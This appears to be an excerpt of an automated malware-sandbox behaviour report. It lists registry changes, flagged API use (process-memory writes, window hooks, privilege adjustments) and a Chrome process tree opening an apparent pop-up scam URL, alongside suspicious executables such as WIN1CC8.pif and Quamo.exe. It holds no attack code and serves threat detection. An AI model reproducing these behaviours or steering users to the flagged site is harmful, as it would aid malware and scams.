Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133822926525502290"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	ZippedFiles.a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Software\Microsoft	WIN1CC8.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Software\Microsoft\DataFactory	WIN1CC8.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN1CC8.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN1CC8.pif
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{2E3630BB-58E7-4A12-835B-99BF54018629}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN1CC8.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN1CC8.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN1CC8.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN1CC8.pif

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
4100	EXCEL.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4116	chrome.exe
4116	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
1012	chrome.exe
1012	chrome.exe
1888	powershell.exe
1888	powershell.exe
4984	msedge.exe
4984	msedge.exe
3728	msedge.exe
3728	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 63 IoCs

pid	Process
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
3728	msedge.exe
3728	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe
Token: SeShutdownPrivilege	4116	chrome.exe
Token: SeCreatePagefilePrivilege	4116	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe
3728	msedge.exe

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
2420	WINWORD.EXE
3980	White.a.exe
1744	Quamo.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4116 wrote to memory of 460	4116	chrome.exe	82
PID 4116 wrote to memory of 460	4116	chrome.exe	82
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2968	4116	chrome.exe	83
PID 4116 wrote to memory of 2644	4116	chrome.exe	84
PID 4116 wrote to memory of 2644	4116	chrome.exe	84
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85
PID 4116 wrote to memory of 4200	4116	chrome.exe	85

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://megascratchrewards.com/?utm_source=pop&utm_medium=111111.111111_111111
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff86584cc40,0x7ff86584cc4c,0x7ff86584cc58
  2⤵
  PID:460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:2968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3
  2⤵
  PID:2644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2540 /prefetch:8
  2⤵
  PID:4200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3676,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3696 /prefetch:1
  2⤵
  PID:60
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3412,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:4956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4524,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4676,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3372,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4672 /prefetch:8
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3360,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:8
  2⤵
  - Modifies registry class
  PID:4428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5056,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:1784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5356,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:4040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5580,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5784,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5988,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5592 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5172,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5428 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5708,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5740 /prefetch:1
  2⤵
  PID:2028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5092,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4592 /prefetch:1
  2⤵
  PID:2664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5248,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5240,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6004 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=3460,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5132,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5828 /prefetch:1
  2⤵
  PID:2940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6036,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:1996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5852,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6272 /prefetch:1
  2⤵
  PID:768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=208,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5212,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6184,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6192 /prefetch:1
  2⤵
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3472,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
